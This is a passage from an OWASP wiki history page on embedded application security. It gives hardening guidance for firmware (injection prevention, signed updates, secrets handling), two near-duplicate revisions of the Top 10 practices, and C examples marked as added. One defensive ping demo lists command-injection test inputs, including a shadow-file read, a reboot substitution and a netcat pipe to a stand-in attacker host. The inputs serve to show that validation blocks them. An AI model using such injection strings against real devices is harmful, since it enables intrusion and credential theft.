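    if (!valid_ping_target(host))
        return -1;

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* The host is one argv element: no word splitting, no globbing. */
        char *argv[] = { "ping", "-c", "1", (char *)host, NULL };
        execvp("ping", argv);
        _exit(127);                 /* only reached if exec itself failed */
    }

    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed inputs a web form might submit. */
    const char *inputs[] = {
        "8.8.8.8", "sensor-01.local", "8.8.8.8; cat /etc/shadow",
        "$(reboot)", "-f", "", NULL
    };
    for (int i = 0; inputs[i] != NULL; i++)
        printf("%-28s valid=%d\n", inputs[i], valid_ping_target(inputs[i]));

    /* Hostile input never reaches fork/exec: */
    printf("ping_safe on hostile input: %d\n",
           ping_safe("8.8.8.8 | nc attacker 4444"));
    /* A live call would be: ping_safe("127.0.0.1"); */
    return 0;
}
```

Validation and exec-without-shell are complementary, not alternatives: execvp alone still lets an attacker pass option-looking strings to the helper, and validation alone still leaves system() open to any character the allow-list author forgot.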
<br />
== E3 – Firmware Updates and Cryptographic Signatures ==<br />
Ensure update mechanisms only accept firmware images that carry a valid cryptographic signature, verified after download and before the image is written to flash, and apply the same requirement where applicable to update functions for third-party software. A cryptographic signature allows verification that a file has not been modified or otherwise tampered with since the developer created and signed it. Signing and verification use public-key cryptography, and forging a digital signature (e.g. a PGP signature) is infeasible without access to the private key; the device itself needs only the public key, which should be stored where an attacker cannot replace it (for example in read-only memory or anchored in the secure boot chain of trust). In the event a private key is compromised, the developers of the software must revoke the compromised key and re-sign all previous firmware releases with the new key.<br />
<br />
== E4 – Securing Sensitive Information ==<br />
Do not hardcode secrets such as passwords, usernames, tokens, private keys or similar into firmware release images. This also applies to sensitive data written to disk. If a hardware secure element (SE) or Trusted Execution Environment (TEE) is available, use it to store sensitive data; otherwise, evaluate strong cryptography to protect the data at rest.<br />
Where possible, all sensitive data in clear text should be ephemeral and reside in volatile memory only.<br />
== E5 – Identity Management ==<br />
User accounts within an embedded device should not be static: avoid default, shared or unchangeable credentials, and make credentials unique per device or set on first use. Separate accounts for internal web management, internal console access, remote web management and remote console access should be available, so that each interface can be restricted independently and an automated credential attack against one interface does not grant access to the others.<br />
<br />
== E6 – Embedded Framework and C-Based Hardening ==<br />
Limit BusyBox, embedded frameworks and toolchains to only those libraries and functions actually being used when configuring firmware builds. Embedded Linux build systems such as Buildroot, Yocto and others typically perform this task. Removing known insecure libraries and protocols such as Telnet not only minimizes attack entry points in firmware builds, but also provides a secure-by-design approach to building software that thwarts potential security threats.<br />
== E7 – Usage of Debug Code and Interfaces ==<br />
It is important to ensure all unnecessary pre-production build code, as well as dead and unused code, has been removed prior to firmware release to all market segments. This includes, but is not limited to, potential backdoor code and root-privilege accounts that may have been left behind by parties such as Original Design Manufacturers (ODMs) and third-party contractors. Typically it falls to Original Equipment Manufacturers (OEMs) to verify this through reverse engineering of the binaries. ODMs should also be required to sign Master Service Agreements (MSAs) ensuring that no backdoor code is included and that all code has been reviewed for software security vulnerabilities, holding all third-party developers accountable for devices that are mass deployed into the market.<br />
== E8 – Transport Layer Security ==<br />
Ensure all communication channels use industry-standard TLS configurations (current protocol versions and cipher suites). TLS keeps data confidential and untampered with while in transit, but only if the device validates the peer's certificate chain and hostname rather than accepting any certificate presented to it. Utilize free certificate authority services such as Let's Encrypt if the embedded device is reached via a domain name.<br />
== E9 – Data Collection, Usage and Storage - Privacy ==<br />
It is critical to limit the collection, storage and sharing of both personally identifiable information (PII) and sensitive personal information (SPI). Leaked information such as Social Security Numbers can lead to customers being compromised, which could have legal repercussions for manufacturers. If information of this nature must be gathered, it is important to follow the concepts of Privacy by Design.<br />
== E10 – Third Party Code and Components ==<br />
Following setup of the toolchain, it is important to ensure that the kernel, software packages and third-party libraries are kept updated to protect against publicly known vulnerabilities. Software such as RomPager, and embedded build tools such as Buildroot, should be checked against vulnerability databases as well as their ChangeLogs to determine when and if an update is needed. This process should be tested by developers and/or QA teams prior to release builds, as updates to embedded systems can cause issues with the operation of those systems.<br />
Embedded projects should maintain a "Bill of Materials" of the third-party and open source software included in their firmware images. This Bill of Materials should be checked to confirm that none of the included third-party software has unpatched vulnerabilities. Up-to-date vulnerability information may be found through the National Vulnerability Database or Open Hub.<br />
<br />
Several solutions exist for cataloging and auditing third-party software:<br />
* Retire.js for JavaScript projects (free)<br />
* Black Duck (paid)<br />
* Package managers (free)<br />
* Buildroot (free)<br />
<br />
= Embedded Device Firmware Analysis Tools =<br />
Over the years, embedded security hardware and software tools have been introduced. Some free, some commercially based. If the lists below are missing tools from your arsenal, please feel free to add them. <br />
<br />
=== Hardware ===<br />
* JTagulator [http://www.grandideastudio.com/jtagulator/]<br />
* UART to USB adapters<br />
** Shikra [http://int3.cc/products/the-shikra]<br />
* TTL / RS-232 serial adapters<br />
* C232HM Cable<br />
* JTAG Adapters<br />
** JLINK<br />
** Jtagulator<br />
** Flyswatter2<br />
* BusPirate<br />
* BusBlaster<br />
* CPLDs (in lieu of FPGAs)<br />
* Oscilloscopes<br />
* Multimeter (Ammeter, Voltmeter, etc)<br />
* Logic Analyzers [https://www.saleae.com/logic16]<br />
* OpenOCD<br />
* GreatFET [https://greatscottgadgets.com/greatfet/]<br />
* Solder station<br />
* Hot air rework gun<br />
* Clips<br />
* Leads<br />
* Headers<br />
* Hooks<br />
<br />
=== Software ===<br />
* Angr - [https://github.com/angr/angr]<br />
* Firmadyne [https://github.com/firmadyne/firmadyne]<br />
* Firmwalker [https://github.com/craigz28/firmwalker]<br />
* [https://github.com/attify/firmware-analysis-toolkit Firmware Analysis Toolkit]<br />
* Binary Analysis [http://www.binaryanalysis.org/en/content/show/download]<br />
* Flawfinder [https://sourceforge.net/projects/flawfinder/]<br />
* IDA Pro (supports ARM / MIPS)<br />
* Radare2 [https://github.com/radare/radare2]<br />
* Buildroot<br />
* GDB<br />
* Binwalk [http://binwalk.org/]<br />
* Firmware Mod Kit [https://code.google.com/archive/p/firmware-mod-kit/]<br />
* Capstone framework [http://www.capstone-engine.org/]<br />
* [https://github.com/fkie-cad/FACT_core Firmware Analysis and Comparison Tool (FACT)]<br />
<br />
= Roadmap =<br />
<br />
== 2018 Roadmap ==<br />
Introductory Embedded Section<br />
* [x] Expand on what embedded firmware is (8,16,32 bit, minimal hardware resources, list embedded use cases and industries)<br />
* [x] Describe types of architectures (MIPS, ARM, PowerPC, x86 etc.)<br />
* [x] Describe types of firmware and operating systems<br />
* [ ] Layout of firmware for embedded Linux, RTOS, and embedded Windows<br />
Expand on embedded best practices<br />
* [ ] Secure boot recommendations<br />
** [x] U-boot<br />
* [x] Create examples of software bill of materials (BOM)<br />
* [x] Additional example programming language command injection system calls or APIs<br />
* [ ] Break out subsections for each of the platforms with contextual guidance and configurations<br />
* [ ] Expand on hardening for:<br />
** [ ] Embedded Linux<br />
** [ ] RTOS (QNX/MQX)<br />
* [ ] Best practices/considerations for PKI in embedded systems<br />
Create example embedded application security requirements for new products<br />
* [ ] Integrate with ASVS or create an EASVS (Embedded Application Security Verification Standard)<br />
* [ ] Integrate with the IoT project<br />
Join the mailing list, slack channel (#embeddedappsec) and contact the Project leaders if you feel you can contribute.<br />
<br />
= Contributing =<br />
You do not have to be a security expert in order to contribute!<br />
<br />
Some of the ways you can help:<br />
* Technical editing<br />
* Review<br />
* Diagrams<br />
* Graphic design<br />
* Code snippets in your favorite language<br />
* Translate guidance material<br />
Feel free to sign up for a task from the roadmap above or add your own idea to it. To get started, create a GitBook account or sign in with your GitHub credentials to add comments and make edits. All changes are tracked and synced to <nowiki>https://github.com/scriptingxss/embeddedappsec</nowiki>. Alternatively, clone the GitHub repo, use your favorite Markdown editor, make your edits, and submit a pull request. Feel free to contact the project leaders for ways to get involved.<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Embedded_Application_Security&diff=245202OWASP Embedded Application Security2018-11-16T21:21:36Z<p>Aaron.guzman: </p>
Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Embedded_Application_Security&diff=245201OWASP Embedded Application Security2018-11-16T21:13:30Z<p>Aaron.guzman: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:100px;border:0,margin:0;overflow: hidden;">[[File:Incubator_big.jpg|link=OWASP_Project_Stages#tab=Incubator_Projects]]</div><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
==OWASP Embedded Application Security Project ==<br />
<br />
The use of embedded software within enterprise and consumer devices continues to grow every year. With the widespread publicity of the Internet of Things (IoT), more and more devices are becoming network connected, which shows how essential it is to create secure coding guidelines for embedded software. Embedded application security is often not a high priority for embedded developers producing devices such as routers, managed switches, medical devices, Industrial Control Systems (ICS), VoIP phones, IoT devices and ATM kiosks, because of other challenges outside of development. Those challenges may include, but are not limited to, the Original Design Manufacturer (ODM) supply chain, limited memory, a small stack, and the difficulty of pushing firmware updates securely to an endpoint. The goals of this project are to create a list of best practices, provide practical guidance to embedded developers, and draw on existing OWASP resources that can bring application security expertise to the embedded world. It is important to note that each of the items and guidance points listed below is longstanding within software security; this document purely tailors issues on which OWASP has previously provided guidance (e.g. OWASP Top 10, Mobile Top 10, etc.) to the embedded community. ''Given the prevalence of Linux kernels in embedded devices, all code examples are geared towards a POSIX environment, but the principles are designed to be platform agnostic.''<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== Mailing List / Group Communication ==<br />
<br />
[https://groups.google.com/a/owasp.org/forum/?hl=en#!forum/embedded-appsec Embedded Sec Mailing List]<br />
[http://owasp.herokuapp.com/ Please join our OWASP Slack channel; look for the #embeddedappsec]<br />
<br />
== Project Leaders ==<br />
<br />
[https://owasp.org/index.php/User:Aaron.guzman Aaron Guzman] [mailto:aaron.guzman@owasp.org @]<br />
<br><br />
[https://owasp.org/index.php/User:Alex.Lafrenz Alex Lafrenz] [mailto:alex.lafrenz@owasp.org @]<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Internet of Things Project]]<br />
* [[C-Based Toolchain Hardening]]<br />
* [[OWASP Mobile Security Project]]<br />
* [[IoT Firmware Analysis]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== News and Events ==<br />
== Releases ==<br />
[https://scriptingxss.gitbooks.io/top-10-embedded-appsec-best-practices/content/ Living Document (GitBook)] <br />
<br />
[https://www.gitbook.com/download/pdf/book/scriptingxss/top-10-embedded-appsec-best-practices Version 1 (2017)]<br />
<br />
Version 2 scheduled for Fall 2018<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" align="center" valign="top" width="50%" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= Embedded Best Practices =<br />
<br />
= Embedded Top 10 Best Practices =<br />
[https://scriptingxss.gitbooks.io/embedded-application-security-best-practices/content/ Click here to find additional details pertaining to each of the top ten categories listed below]<br />
== E1 – Buffer and Stack Overflow Protection ==<br />
Prevent the use of known dangerous functions and APIs (e.g. the unsafe C functions strcat, strcpy, sprintf, scanf) in an effort to protect against memory-corruption vulnerabilities within firmware. Memory-corruption vulnerabilities such as buffer overflows can consist of overflowing the stack (stack overflow) or overflowing the heap (heap overflow). For simplicity, this document does not distinguish between these two types of vulnerabilities. If an attacker detects and exploits a buffer overflow, the saved instruction pointer can be overwritten so that execution is redirected to arbitrary malicious code supplied by the attacker.<br />
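The following is an added example, not code from the OWASP page or the project: an unbounded copy of the kind E1 warns about next to a bounded replacement that refuses oversized input instead of overflowing or silently truncating. HOSTNAME_MAX and the function names are assumptions for the example.<br />

```c
/* Added example, not from the OWASP page: copying an externally supplied
 * string (e.g. a hostname from a web form) into a fixed-size buffer.
 * HOSTNAME_MAX is a constructed limit for the example. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

#define HOSTNAME_MAX 32

/* The pattern E1 warns about: strcpy() does not know how large dst is, so any
 * src longer than HOSTNAME_MAX - 1 writes past the end of the buffer. */
void copy_unsafe(char dst[HOSTNAME_MAX], const char *src)
{
    strcpy(dst, src);
}

/* Hardened: measure with a bound, and reject input that would not fit rather
 * than silently truncating. Returns 0 on success, -1 if src is too long. */
int copy_bounded(char *dst, size_t dst_len, const char *src)
{
    size_t n = strnlen(src, dst_len);  /* never scans past dst_len bytes */
    if (dst_len == 0 || n >= dst_len) {
        if (dst_len > 0)
            dst[0] = '\0';             /* leave a valid, empty string */
        return -1;
    }
    memcpy(dst, src, n + 1);           /* n + 1 copies the terminating NUL */
    return 0;
}

/* Same idea for formatted output: snprintf() returns the length it wanted,
 * so truncation is detected instead of becoming sprintf()'s overflow. */
int format_bounded(char *dst, size_t dst_len, const char *host, int port)
{
    int needed = snprintf(dst, dst_len, "%s:%d", host, port);
    return (needed < 0 || (size_t)needed >= dst_len) ? -1 : 0;
}

int main(void)
{
    char buf[HOSTNAME_MAX];
    if (copy_bounded(buf, sizeof buf, "router.local") == 0)
        printf("copied: %s\n", buf);
    if (format_bounded(buf, sizeof buf, "router.local", 443) == 0)
        printf("formatted: %s\n", buf);
    return 0;
}
```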
== E2 – Injection Prevention ==<br />
Ensure all untrusted data and user input is validated, sanitized, and/or output-encoded to prevent unintended system execution. There are various injection attacks within application security, such as operating system (OS) command injection, cross-site scripting (e.g. JavaScript injection), SQL injection, and others such as XPath injection. However, the most prevalent injection attack within embedded software is OS command injection: an application accepts untrusted/insecure input and passes it to external applications (either as the application name itself or as arguments) without validation or proper escaping.<br />
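As an added example (not from the OWASP page or the project), the OS command injection case described above in a typical router diagnostics feature: a user-supplied host is allowlist-validated and then passed to ping via an argument vector rather than a shell command line. valid_host() and ping_safe() are hypothetical names chosen for the example.<br />

```c
/* Added example, not from the OWASP page: a diagnostics feature that pings a
 * host supplied by the user. valid_host() and ping_safe() are hypothetical
 * names; the hardened form validates the value and execs the binary directly,
 * so no shell ever parses user input. */
#define _POSIX_C_SOURCE 200809L
#include <ctype.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Allowlist check: only letters, digits, '.' and '-' (enough for hostnames
 * and IPv4 literals), sane length, and no leading '-' so the value cannot be
 * mistaken for a ping option. Shell metacharacters such as ';', '|', '`'
 * and '$' never pass. Returns 1 if acceptable, 0 otherwise. */
int valid_host(const char *host)
{
    size_t len = strlen(host);
    if (len == 0 || len > 253 || host[0] == '-')
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)host[i];
        if (!isalnum(c) && c != '.' && c != '-')
            return 0;
    }
    return 1;
}

/* Instead of system("ping -c 1 <host>"), which hands the string to /bin/sh,
 * fork and execvp() with an argument vector: host becomes one argv element
 * and is never interpreted. Returns ping's exit status, or -1 if the input
 * was rejected or the child could not be spawned. */
int ping_safe(const char *host)
{
    if (!valid_host(host))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { "ping", "-c", "1", (char *)host, NULL };
        execvp(argv[0], argv);
        _exit(127);  /* only reached if exec itself failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```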
<br />
== E3 – Firmware Updates and Cryptographic Signatures ==<br />
Ensure robust update mechanisms utilize cryptographically signed firmware images upon download and, when applicable, for update functions pertaining to third-party software. A cryptographic signature allows verification that files have not been modified or otherwise tampered with since the developer created and signed them. The signing and verification process uses public-key cryptography, and it is difficult to forge a digital signature (e.g. a PGP signature) without first gaining access to the private key. In the event a private key is compromised, the developers of the software must revoke the compromised key and will need to re-sign all previous firmware releases with the new key.<br />
<br />
== E4 – Securing Sensitive Information ==<br />
Do not hardcode secrets such as passwords, usernames, tokens, private keys or similar variants into firmware release images. This also includes the storage of sensitive data that is written to disk. If a hardware secure element (SE) or Trusted Execution Environment (TEE) is available, it is recommended to utilize such features for storing sensitive data. Otherwise, the use of strong cryptography should be evaluated to protect the data.<br />
If possible, all sensitive data in clear text should be ephemeral by nature and reside in volatile memory only.<br />
== E5 – Identity Management ==<br />
User accounts within an embedded device should not be static in nature. Features that allow separation of user accounts for internal web management, internal console access, as well as remote web management and remote console access should be available to prevent automated malicious attacks.<br />
<br />
== E6 – Embedded Framework and C-Based Hardening ==<br />
Limit BusyBox, embedded frameworks, and toolchains to only those libraries and functions being used when configuring firmware builds. Embedded Linux build systems such as Buildroot, Yocto and others typically perform this task. Removal of known insecure libraries and protocols such as Telnet not only minimizes attack entry points in firmware builds, but also provides a secure-by-design approach to building software in an effort to thwart potential security threats.<br />
== E7 – Usage of Debug Code and Interfaces ==<br />
It is important to ensure all unnecessary pre-production build code, as well as dead and unused code, has been removed prior to firmware release to all market segments. This includes, but is not limited to, potential backdoor code and root-privilege accounts that may have been left by parties such as Original Design Manufacturers (ODM) and third-party contractors. Typically this falls in scope for Original Equipment Manufacturers (OEM) to perform via reverse engineering of binaries. This should also require ODMs to sign Master Service Agreements (MSA) ensuring that no backdoor code is included and that all code has been reviewed for software security vulnerabilities, holding all third-party developers accountable for devices that are mass deployed into the market.<br />
== E8 – Transport Layer Security ==<br />
Ensure all methods of communication are utilizing industry standard encryption configurations for TLS. The use of TLS ensures that all data remains confidential and untampered with while in transit. Utilize free certificate authority services such as Let’s Encrypt if the embedded device utilizes domain names.<br />
== E9 – Data Collection, Usage and Storage - Privacy ==<br />
It is critical to limit the collection, storage, and sharing of both personally identifiable information (PII) as well as sensitive personal information (SPI). Leaked information such as Social Security Numbers can lead to customers being compromised which could have legal repercussions for manufacturers. If information of this nature must be gathered, it is important to follow the concepts of Privacy-by-Design.<br />
== E10 – Third Party Code and Components ==<br />
Following setup of the toolchain, it is important to ensure that the kernel, software packages, and third-party libraries are updated to protect against publicly known vulnerabilities. Software such as RomPager or embedded build tools such as Buildroot should be checked against vulnerability databases as well as their ChangeLogs to determine when and if an update is needed. It is important to note that this process should be tested by developers and/or QA teams prior to release builds, as updates to embedded systems can cause issues with the operation of those systems.<br />
Embedded projects should maintain a “Bill of Materials” of the third party and open source software included in its firmware images. This Bill of Materials should be checked to confirm that none of the third party software included has any unpatched vulnerabilities. Up to date vulnerability information may be found through the National Vulnerability Database or Open Hub.<br />
<br />
Several solutions exist for cataloging and auditing third-party software:<br />
* Retire.js for JavaScript projects (free)<br />
* Black Duck (paid)<br />
* Package managers (free)<br />
* Buildroot (free)<br />
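The Bill of Materials check described above, as an added example that is not part of the OWASP page or the project: each bundled component is compared against the first version carrying a fix, using a version comparator that orders dotted releases numerically and handles single-letter suffixes. Both tables are constructed for the example and are not real advisory data.<br />

```c
/* Added example, not from the OWASP page: checking a firmware Bill of
 * Materials against the versions that carry a fix. Both tables below are
 * constructed for the example (not real advisory data); in practice the BOM
 * comes from the build system and fixed versions from the NVD or ChangeLogs. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct component { const char *name; const char *version; };
static const struct component bom[] = {          /* what the image bundles */
    { "busybox", "1.29.3" }, { "openssl", "1.0.2q" }, { "dropbear", "2019.78" },
};
static const struct component fixed_in[] = {     /* constructed advisories */
    { "busybox", "1.30.0" }, { "openssl", "1.0.2r" }, { "dropbear", "2019.78" },
};

/* Compare dotted versions numerically ("1.10" > "1.9") with single-letter
 * suffixes ("1.0.2q" < "1.0.2r"); a missing suffix sorts before a present one.
 * Returns <0, 0 or >0 like strcmp(). */
int version_cmp(const char *a, const char *b)
{
    while (*a || *b) {
        long na = strtol(a, (char **)&a, 10);   /* a advances past digits */
        long nb = strtol(b, (char **)&b, 10);
        if (na != nb) return na < nb ? -1 : 1;
        /* Non-numeric, non-dot characters are suffixes: compare, then skip. */
        int sa = (*a && *a != '.') ? (unsigned char)*a : 0;
        int sb = (*b && *b != '.') ? (unsigned char)*b : 0;
        if (sa != sb) return sa < sb ? -1 : 1;
        if (sa) { a++; b++; }
        if (*a == '.') a++;
        if (*b == '.') b++;
    }
    return 0;
}

/* Reports every BOM entry older than its fixed version; returns the count. */
int audit_bom(void)
{
    int findings = 0;
    for (size_t i = 0; i < sizeof bom / sizeof bom[0]; i++)
        for (size_t j = 0; j < sizeof fixed_in / sizeof fixed_in[0]; j++)
            if (strcmp(bom[i].name, fixed_in[j].name) == 0 &&
                version_cmp(bom[i].version, fixed_in[j].version) < 0) {
                printf("UPDATE %s %s -> %s\n", bom[i].name, bom[i].version,
                       fixed_in[j].version);
                findings++;
            }
    return findings;
}
```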
<br />
= Embedded Device Firmware Analysis Tools =<br />
<br />
* [https://github.com/angr/angr Angr]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
* [https://github.com/craigz28/firmwalker Firmwalker]<br />
* [https://github.com/attify/firmware-analysis-toolkit Firmware Analysis Toolkit]<br />
* [http://www.binaryanalysis.org/en/content/show/download Binary Analysis]<br />
* [https://sourceforge.net/projects/flawfinder/ Flawfinder]<br />
* IDA Pro (supports ARM / MIPS)<br />
* [https://github.com/radare/radare2 Radare2]<br />
* GDB<br />
* [http://binwalk.org/ Binwalk]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware-mod-kit]<br />
* [http://www.capstone-engine.org/ Capstone framework]<br />
* [http://int3.cc/products/the-shikra Shikra]<br />
* [http://www.grandideastudio.com/jtagulator/ JTAGulator]<br />
* UART cables<br />
* JTAG adapters (J-Link)<br />
* Bus Pirate<br />
* Bus Blaster<br />
* CPLDs (in lieu of FPGAs)<br />
* Oscilloscopes<br />
* Multimeter (ammeter, voltmeter, etc.)<br />
* [https://www.saleae.com/logic16 Logic analyzers]<br />
* OpenOCD<br />
* [https://greatscottgadgets.com/greatfet/ GreatFET]<br />
* [https://github.com/fkie-cad/FACT_core Firmware Analysis and Comparison Tool]<br />
<br />
= Roadmap =<br />
<br />
== 2018 Roadmap ==<br />
Introductory Embedded Section<br />
* [x] Expand on what embedded firmware is (8,16,32 bit, minimal hardware resources, list embedded use cases and industries)<br />
* [x] Describe types of architectures (MIPS, ARM, PowerPC, x86 etc.)<br />
* [x] Describe types of firmware and operating systems<br />
* [ ] Layout of firmware for embedded Linux, RTOS, and embedded Windows<br />
Expand on embedded best practices<br />
* [ ] Secure boot recommendations<br />
** [x] U-boot<br />
* [x] Create examples of software bill of materials (BOM)<br />
* [x] Additional example programming language command injection system calls or APIs<br />
* [ ] Break out subsections for each of the platforms with contextual guidance and configurations<br />
* [ ] Expand on hardening for:<br />
** [ ] Embedded Linux<br />
** [ ] RTOS (QNX/MQX)<br />
* [ ] Best practices/considerations for PKI in embedded systems<br />
Create example embedded application security requirements for new products<br />
* [ ] Integrate with ASVS or create an EASVS (Embedded Application Security Verification Standard)<br />
* [ ] Integrate with the IoT project<br />
Join the mailing list and Slack channel (#embeddedappsec), and contact the project leaders if you feel you can contribute.<br />
<br />
= Contributing =<br />
You do not have to be a security expert in order to contribute!<br />
<br />
Some of the ways you can help:<br />
* Technical editing<br />
* Review<br />
* Diagrams<br />
* Graphic design<br />
* Code snippets in your favorite language<br />
* Translate guidance material<br />
Feel free to sign up for a task from our roadmap or add your own idea to the roadmap. To get started, create a GitBook account or sign in with your GitHub credentials to add comments and make edits. All changes are tracked and synced to <nowiki>https://github.com/scriptingxss/embeddedappsec</nowiki>. Alternatively, clone the GitHub repo, use your favorite Markdown editor, make your edits, and submit a pull request. Feel free to contact the project leaders for ways to get involved.<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]]</div>Aaron.guzman